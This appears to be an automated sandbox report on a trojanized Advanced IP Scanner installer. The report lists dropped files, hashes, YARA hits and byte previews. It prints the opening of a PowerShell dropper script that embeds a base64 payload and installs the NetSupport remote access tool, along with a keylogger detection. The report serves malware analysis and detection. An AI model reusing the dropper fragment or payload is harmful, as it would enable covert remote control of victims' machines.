Preview:	.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.\|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q\|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.\|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282664
Entropy (8bit):	6.463228483563671
Encrypted:	false
SSDEEP:	6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
MD5:	BA337B8D1BC9F117F7605A2B79B10064
SHA1:	9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
SHA-256:	EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
SHA-512:	277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	900288
Entropy (8bit):	6.823623458577979
Encrypted:	false
SSDEEP:	24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
MD5:	3E0303F978818E5C944F5485792696FD
SHA1:	3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
SHA-256:	7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
SHA-512:	C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	InnoSetup Log Advanced IP Scanner {FFA0FB35-59D6-4B0D-863C-1431EA12E295}, version 0x418, 6118283 bytes, 609290\37\user\376, C:\Program Files (x86)\Advanced IP Scanner
Category:	dropped
Size (bytes):	6118283
Entropy (8bit):	4.02429238117015
Encrypted:	false
SSDEEP:	49152:8hlFVfsWKHsBLL2NpPytQCiNQj716hKpKe2f8E2U/q:i
MD5:	93FF33706311AA947C84A1914F3F9352
SHA1:	67286736B9B049C60B822FEB0C20C867FD6111C2
SHA-256:	E4237B729133457D0C7405243E77F50E24AD948816495FB26637D4659AD56334
SHA-512:	2D5F63294A37D8282A7FB5E6D16F6ED52F900A32D426DA9416B4C4E72C61AC618C797FF06DA7FAE1B01DA4F3C700E962D6D1E9E8B158FD78685A806B3D92E313
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security
Preview:	Inno Setup Uninstall Log (b)....................................{FFA0FB35-59D6-4B0D-863C-1431EA12E295}}.........................................................................................Advanced IP Scanner......................................................................................................................[].................................................................................................................f.............]c...............6.0.9.2.9.0......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r................0...... ......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...

C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3329597
Entropy (8bit):	6.563292325267208
Encrypted:	false
SSDEEP:	49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PK:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334S
MD5:	3EAAE4BAD7C2BD8319CDCDFCAAC03B7E
SHA1:	3FA168131A590D0EB7C80B6F321304A2070985E6
SHA-256:	938C1F61125871F4A0B8F2382F29C420443DD755F01A596996E444A360CA21A3
SHA-512:	98D76D607D8B2D44B53B8926BD1C58E7249D63C80066C34D420D0CCA3A9190072AAD21A4C073E12AE4F70086F8516621B6D2B3170D9519C1F51EB46B888CEAC4
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Oct 31 16:48:27 2024, mtime=Thu Oct 31 16:48:27 2024, atime=Fri Apr 29 17:13:52 2022, length=1681960, window=hide
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	4.587982080126385
Encrypted:	false
SSDEEP:	24:8mX/nJcEFdOE0T1wmnaG2IEUn4Ake/aoT5dcaGTUnKxdcaG7jaGOalUUzkhHqyFm:8mX/nZFdOBTymna3IEKfFCydcaqKKdcS
MD5:	F01377605AF6B4C7BDEFAC55CA8CE2F1
SHA1:	233B1702D049F9116ABDB43282849A4E2A05F215
SHA-256:	56682DDFDCF94C97F4712EB280B0BADD7BF00F22060D2F421BF2430896E0EDAD
SHA-512:	53FDDDA96C58C04C21CFF6C1D4B972238EFE6740CCDEB5D19B6C925554FF9038BC12B5C4166940680EB3A48552C7B3ED7E178FCFE9F719F36DBE6018B9503D73
Malicious:	false
Preview:	L..................F.... .......+....#..+...0s..[..(............................P.O. .:i.....+00.../C:\.....................1....._Y....PROGRA~2.........O.I_Y......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....p.1....._Y....ADVANC~1..X......_Y.._Y......i.....................,.g.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.....\|.2.(....T.. .ADVANC~1.EXE..`......_Y.._Y................................a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.......q...............-.......p..................C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe..Q.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.?.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.A.d.v.a.n.c.e.d._.I.P._.S.c.a.n.n.e.r...i.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

Download File

Process:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	15
Entropy (8bit):	2.7329145639793984
Encrypted:	false
SSDEEP:	3:QJgTG:QkG
MD5:	8AB0D91EF06123198FFAC30AD08A14C7
SHA1:	46D83BB84F74D8F28427314C6084CC9AFE9D1533
SHA-256:	DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
SHA-512:	1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
Malicious:	false
Preview:	32.7767,-96.797

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	5.467764531932053
Encrypted:	false
SSDEEP:	48:QN1WSU4y4RYdmloUeW+mZ9tlNWR831NTxB9001dqZ0:QPLHyIYMqLmZXW8nHS01YZ0
MD5:	EC74C95B5AE7E23E0EC1DE7D87BFACB1
SHA1:	3E414178FE609A64387CB08464E96EF8D26758C6
SHA-256:	7EA0FBEEA04A7B7CA46C9528114E7F7051101D92D1C40B20C9D943D4CC46A12F
SHA-512:	AD87DBC8D6F8FD41FAADF91677ACDC128F4D10101D23D268FEB5811C7488CB6CAC5F7738E257E0F39C993C98D7DB8BCAFD974E5E64FDA0DBBA40B03E90492C8C
Malicious:	false
Preview:	@...e...........S....................................@..........P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...\|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4igrxoea.n1m.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxvqd1bb.a44.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynw52z5h.1ox.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpr3rbzi.bjw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Download File

Process:	C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3305472
Entropy (8bit):	6.57660301759331
Encrypted:	false
SSDEEP:	49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PV:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334d
MD5:	597637EDBEBB79D482E762E238209BCD
SHA1:	840091CFDFB0C47AAFD59F127C593DDB1B857C12
SHA-256:	592BEDCC2C1CD3491ED40B3CDB8DD5CA6D248598BDF871145C300028EADAC4CD
SHA-512:	80361FF1154EE2BFFA5B48DAB886E5040536755734CCC94AB170166C5E4C93DBE7052D19DF14DA162F92D2D8390B2C3B7D49416C41C200BFDA12C4030AB458EE
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	ASCII text, with very long lines (65333), with CRLF line terminators
Category:	dropped
Size (bytes):	3035666
Entropy (8bit):	5.9992842391395556
Encrypted:	false
SSDEEP:	49152:We6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:5
MD5:	FBD2C66EE39FEA4BDF9ED9F3C0D8AD28
SHA1:	E3C517FA670A7A895997989E83EE68430EB82714
SHA-256:	A18C7CDA2F17E7819EA29F62F288ACF92360B29B8B2B7C431F3A7E7752352DAF
SHA-512:	556926562836D1DE36C0EACF3494F089996A5896DCE1B0EC6DBFB2F1274CD964B378F128401BFD156D295C3D5BF52200F96193DE6B78A4EE49ED2B9560502E76
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1, Author: Joe Security
Preview:	$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\SysHelper";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFel

C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93560
Entropy (8bit):	6.5461580255883876
Encrypted:	false
SSDEEP:	1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:	4182F37B9BA1FA315268C669B5335DDE
SHA1:	2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:	A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
SHA-512:	4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........in.:n.:n.:g.6:\|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\NSM.LIC

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.103526864179364
Encrypted:	false
SSDEEP:	6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
MD5:	866C96BA2823AC5FE70130DFAAA08531
SHA1:	892A656DA1EA264C73082DA8C6E5F5728ABCB861
SHA-256:	6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
SHA-512:	0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
Malicious:	true
Preview:	1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3642864
Entropy (8bit):	6.5156874906689275
Encrypted:	false
SSDEEP:	49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
MD5:	214A714EF11C2C91162A9344BF8F2E50
SHA1:	B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
SHA-256:	74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
SHA-512:	A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security
